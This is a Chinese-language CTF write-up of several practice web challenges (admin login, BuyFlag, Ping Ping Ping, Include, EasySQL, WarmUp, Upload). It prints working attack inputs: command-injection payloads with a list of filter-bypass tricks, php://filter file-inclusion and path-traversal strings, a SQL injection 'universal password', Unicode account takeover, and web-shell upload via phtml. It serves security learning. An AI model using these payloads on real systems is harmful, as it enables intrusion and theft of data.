目录
[HCTF 2018]admin
[极客大挑战 2019]BuyFlag
[ACTF2020 新生赛]Exec
[GXYCTF2019]Ping Ping Ping
[ACTF2020 新生赛]Include
[极客大挑战 2019]EasySQL
[极客大挑战 2019]Havefun
[HCTF 2018]WarmUp
[极客大挑战 2019]Secret File
[极客大挑战 2019]Upload
[ACTF2020 新生赛]Upload
启动靶机
进入登录页面,题目的提示是admin,所以可能是使用admin登录上去
解法一:
我们发现使用弱口令,Username:admin,Password:123(弱口令),登录上去,获得flag
解法二:
我们发现还有注册页面,但是无法注册账号为admin、ADMIN......
https://www.anquanke.com/post/id/164086#h3-7
由大佬的文章可得:可以使用ᴬᴰᴹᴵᴺ注册,密码为123,
注册成功后,登录进去,然后进行改密码,改为456
然后退出来,使用admin,456登录,获得flag
查找还有两种方案,但是我不会
打开靶机,查看源码发现
发现这里发生了变化,使用Max HacKBar
我们发现这里的Nember lenth is too long,所以使用money[]=1&password=404mochu,然后得到flag。
参考文献:
https://blog.csdn.net/mochu7777777/article/details/109501224
输入127.0.0.1
127.0.0.1 & ls;
我们直接读取flag 127.0.0.1 & cat /flag
ls查询发现flag.php,cat flag.php发现不行,应该是过滤了
${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
<
<>
{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
%20 (space)
%09 (tab)
X=$'cat\x09./flag.php';$X
tip:有时会禁用cat:
解决方法是使用tac反向输出命令:
linux命令中可以加\,所以甚至可以ca\t /fl\ag
空格用$IFS$绕过后发现
?ip=127.0.0.1;a=f;cat$IFS$1$alag.php 过滤
?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php 没flag
?ip=127.0.0.1;a=a;cat$IFS$1fl$ag.php 过滤
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 有flag
?ip=127.0.0.1;a=fl;b=ag;cat$IFS$1$a$b.php 过滤
?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php 有flag
可能是过滤了flag,我们用/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php绕过,绕过后查看源码,发现flag
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到的进行base64解密,得到
参考:
https://blog.csdn.net/TM_1024/article/details/106966460
使用万能密码1' or '1' = '1
得到flag
打开源码,有发现
cat=dog,得到flag
访问hint.php
没有flag,再回来分析源码
没有flag,那我们继续 source.php?file=source.php?../../../../../ffffllllaaaagggg得到flag
进入查看源代码,发现Archive_room.php
进入Archive_room.php,
发现什么都没有,进行查看,发现没有什么,试一下抓包,有了发现,发现了这个secr3t.php
我们发现这里有php,一看就是文件包含,接下来进行代码审计(难受)
这里使用文件包含伪协议https://blog.csdn.net/Wu000999/article/details/101925271
所以使用:file=php://filter/read=convert.base64-encode/resource=./flag.php
这里出现base64,进行解密,得到
flag就在其中
发现过滤了<,上传jpg图片也不成功
一句话木马
GIF89a?
绕过<,php利用phtml绕过
上传成功,我们现在使用蚁剑连接
然后找到flag
上传jpg文件,改为php上传失败,然后改为phtml发现上传成功,用蚁剑连接